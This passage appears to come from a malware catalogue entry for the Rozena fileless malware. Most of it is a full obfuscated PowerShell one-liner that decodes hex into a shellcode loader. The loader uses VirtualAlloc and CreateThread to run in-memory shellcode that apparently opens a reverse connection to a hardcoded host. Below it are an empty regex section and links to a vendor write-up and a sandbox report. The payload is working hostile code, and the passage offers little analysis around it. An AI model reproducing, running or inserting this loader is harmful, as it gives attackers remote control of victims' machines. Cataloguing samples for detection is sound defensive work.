-JoIn(('2448573376513074455a5a424e3d2e282827362034203420352032203320312030272d7245704c416365275c772b272c277b247b307d7d272d7265506c6143652720272c2727292d662765272c2770272c2774272c2779272c2764272c272d272c27612729202d6d20275b446c6c496d706f727428226b65726e656c33322e646c6c22295d207075626c6963207374617469632065787465726e20496e74507472205669727475616c416c6c6f6328496e74507472206c70416464726573732c2075696e7420647753697a652c2075696e7420666c416c6c6f636174696f6e547970652c2075696e7420666c50726f74656374293b5b446c6c496d706f727428226b65726e656c33322e646c6c22295d207075626c6963207374617469632065787465726e20496e745074722043726561746554687265616428496e74507472206c70546872656164417474726962757465732c2075696e74206477537461636b53697a652c20496e74507472206c705374617274416464726573732c20496e74507472206c70506172616d657465722c2075696e742064774372656174696f6e466c6167732c20496e74507472206c705468726561644964293b5b446c6c496d706f727428226d73766372742e646c6c22295d207075626c6963207374617469632065787465726e20496e74507472206d656d73657428496e7450747220646573742c2075696e74207372632c2075696e7420636f756e74293b27202d6e616d65202757696e333227202d6e732057696e333246756e6374696f6e73202d7061733b5b427954455b5d5d2459384953465267795335455a3d307866632c307865382c307838322c307830302c307830302c307830302c307836302c307838392c307865352c307833312c307863302c307836342c307838622c307835302c307833302c307838622c307835322c307830632c307838622c307835322c307831342c307838622c307837322c307832382c307830662c307862372c307834612c307832362c307833312c307866662c307861632c307833632c307836312c307837632c307830322c307832632c307832302c307863312c307863662c307830642c307830312c307863372c307865322c307866322c307835322c307835372c307838622c307835322c307831302c307838622c307834612c307833632c307838622c307834632c307831312c307837382c307865332c307834382c307830312c307864312c307835312c307838622c307835392c307832302c307830312c307864332c307838622c307834392c307831382c307865332c307833612c307834392c307838622c307833342c307838622c307830312c307864362c307833312c307866662c307861632c307863312c307863662c307830642c307830312c307863372c307833382c307865302c307837352c307866362c307830332c307837642c307866382c307833622c307837642c307832342c307837352c307865342c307835382c307838622c307835382c307832342c307830312c307864332c307836362c307838622c307830632c307834622c307838622c307835382c307831632c307830312c307864332c307838622c307830342c307838622c307830312c307864302c307838392c307834342c307832342c307832342c307835622c307835622c307836312c307835392c307835612c307835312c307866662c307865302c307835662c307835662c307835612c307838622c307831322c307865622c307838642c307835642c307836382c307833332c307833322c307830302c307830302c307836382c307837372c307837332c307833322c307835662c307835342c307836382c307834632c307837372c307832362c307830372c307866662c307864352c307862382c307839302c307830312c307830302c307830302c307832392c307863342c307835342c307835302c307836382c307832392c307838302c307836622c307830302c307866662c307864352c307836612c307830352c307836382c307831322c307865372c307837392c307862392c307836382c307830322c307830302c3078312c307862622c307838392c307865362c307835302c307835302c307835302c307835302c307834302c307835302c307834302c307835302c307836382c307865612c307830662c307864662c307865302c307866662c307864352c307839372c307836612c307831302c307835362c307835372c307836382c307839392c307861352c307837342c307836312c307866662c307864352c307838352c307863302c307837342c307830632c307866662c307834652c307830382c307837352c307865632c307836382c307866302c307862352c307861322c307835362c307866662c307864352c307836612c307830302c307836612c307830342c307835362c307835372c307836382c307830322c307864392c307863382c307835662c307866662c307864352c307838622c307833362c307836612c307834302c307836382c307830302c307831302c307830302c307830302c307835362c307836612c307830302c307836382c307835382c307861342c307835332c307865352c307866662c307864352c307839332c307835332c307836612c307830302c307835362c307835332c307835372c307836382c307830322c307864392c307863382c307835662c307866662c307864352c3078312c307863332c307832392c307863362c307837352c307865652c307863333b246478756c74424a654f626d533d2448573376513074455a5a424e3a3a2828273120362034203320352037203020372030203020382032272d7265706c416365275c772b272c277b247b307d7d272d7265506c4143452720272c2727292d66276c272c2776272c2763272c2774272c2772272c2775272c2769272c2761272c276f27292e696e566f4b6528302c5b4d6174685d3a3a28277b317d7b307d272d66276158272c274d27292e696e766f6b45282459384953465267795335455a2e2828273420332030203520312032272d7245506c616345275c772b272c277b247b307d7d272d7245506c4143452720272c2727292d66276e272c2774272c2768272c2765272c276c272c276727292c307831303030292c3078333030302c30783430293b666f7228246e4a493233596c5a725a4a753d303b246e4a493233596c5a725a4a75202d6c6520282459384953465267795335455a2e2828273120322033203420302035272d7245704c416365275c772b272c277b247b307d7d272d5245704c4143452720272c2727292d662774272c276c272c2765272c276e272c2767272c276827292d31293b246e4a493233596c5a725a4a752b2b297b5b764f69445d2448573376513074455a5a424e3a3a28277b307d7b317d272d66276d656d272c2753655427292e496e564f4b65285b694e745054725d28246478756c74424a654f626d532e546f496e74333228292b246e4a493233596c5a725a4a75292c2459384953465267795335455a5b246e4a493233596c5a725a4a755d2c31297d3b2448573376513074455a5a424e3a3a28277b317d7b327d7b307d272d6627456144272c2743724561746554272c27487227292e696e566f4b6528302c302c246478756c74424a654f626d532c302c302c30293b2e282827362031203420302031203720362035203320332032272d7265506c616365275c772b272c277b247b307d7d272d7245504c6163452720272c2727292d662772272c2774272c2770272c2765272c2761272c276c272c2773272c272d272920313030303030'-split'(?<=\G.{2})(?!$)')|%{[conVERT]::('To'+'InT'+'16').INvoKE(($_),16)-as[chaR]}))|&(&(('2 1 0'-rePlAce'\w+','{${0}}'-ReplaCe' ','')-f'm','c','g')(('5 4 8 1 2 7 6 7 3 0 9 7 10 10 5 1 4'-ReplACE'\w+','{${0}}'-REpLACE' ','')-f'p','o','k','x','n','i','-','e','v','r','s')) 31 | ``` 32 | 33 | #### Regular Expressions 34 | --- 35 | 36 | `` 37 | `` 38 | 39 | #### Resources 40 | --- 41 | 42 | Technical write-ups: 43 | * https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena 44 | 45 | Sandbox reports: 46 | * https://www.hybrid-analysis.com/sample/c23d6700e93903d05079ca1ea4c1e36151cdba4c5518750dc604829c0d7b80a7?environmentId=120 47 | 48 | Notes: 49 | 50 | 51 | 52 | 53 | --------------------------------------------------------------------------------